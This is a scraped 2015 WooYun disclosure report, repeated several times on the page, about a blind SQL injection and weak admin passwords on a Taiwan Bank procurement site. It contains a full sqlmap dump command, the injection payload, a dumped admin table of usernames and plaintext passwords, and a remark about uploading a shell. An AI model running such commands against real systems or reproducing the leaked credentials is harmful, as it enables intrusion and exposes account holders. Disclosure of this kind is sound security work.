台湾银行采购网某处存在布尔盲注漏洞+后台弱密码（可增删改查相关信息）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145735

漏洞标题：台湾银行采购网某处存在布尔盲注漏洞+后台弱密码（可增删改查相关信息）（臺灣地區）

漏洞作者：路人甲

提交时间：2015-10-10 16:02

修复时间：2015-11-26 15:12

公开时间：2015-11-26 15:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-10：细节已通知厂商并且等待厂商处理中
2015-10-12：厂商已经确认，细节仅向厂商公开
2015-10-22：细节向核心白帽子及相关领域专家公开
2015-11-01：细节向普通白帽子公开
2015-11-11：细节向实习白帽子公开
2015-11-26：细节向公众公开

简要描述：

台湾银行采购网某处存在sql注入漏洞+后台弱密码（可增删改查相关信息）

详细说明：

使用sqlmap进行测试：
测试地址：http://**.**.**.**/display02/center.asp?organizeID=73

python sqlmap.py -u "http://**.**.**.**/display02/center.asp?organizeID=73" --random-agent -p organizeID --technique=B -T admin -C username,user_id,name,passwd --dump --threads=10

登陆地址：http://**.**.**.**/display02/sandyLogin.asp

漏洞证明：

---
Parameter: organizeID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: organizeID=73 AND 9565=9565
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

Database: Microsoft_Access_masterdb
Table: admin
[11 entries]
+----------+---------+----------------------+----------+
| username | user_id | name                 | passwd   |
+----------+---------+----------------------+----------+
| 2248     | 2       | R\\?a9t\x06          | 2248     |
| 3208     | 1       | R\\?a9t\x06          | 3208     |
| angle    | 8       | imR\\?d9R\\?a9t\x06  | 4181     |
| fei      | 7       | imR\\?d9\\\x08T\\?e1 | 6451     |
| dragon   | 5       | STt\x06              | 6658     |
| lin      | 6       | ??                   | 6704     |
| andrew   | 10      | Ro~=                 | 7356     |
| mary     | 9       | imR\\?d9R\\?a9t\x06  | 8076     |
| 1234     | 3       | ^\x1d?               | 9581     |
| arashi   | 11      | ?e?R\\?a9t\x06       | 9723     |
| ronan710 | 4       | {\\?a1t\x06?         | enajm86v |
+----------+---------+----------------------+----------+

登陆地址：http://**.**.**.**/display02/sandyLogin.asp

看到有上传的地方了~而且还允许exe……或许可以试试上个shell上去，这里就不试了。

修复方案：

增加过滤。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-10-12 15:11

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145735

漏洞标题：台湾银行采购网某处存在布尔盲注漏洞+后台弱密码（可增删改查相关信息）（臺灣地區）

相关厂商：台湾银行采购网

漏洞作者：路人甲

提交时间：2015-10-10 16:02

修复时间：2015-11-26 15:12

公开时间：2015-11-26 15:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145735

漏洞标题：台湾银行采购网某处存在布尔盲注漏洞+后台弱密码（可增删改查相关信息）（臺灣地區）

相关厂商：台湾银行采购网

漏洞作者： 路人甲

提交时间：2015-10-10 16:02

修复时间：2015-11-26 15:12

公开时间：2015-11-26 15:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0145735"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云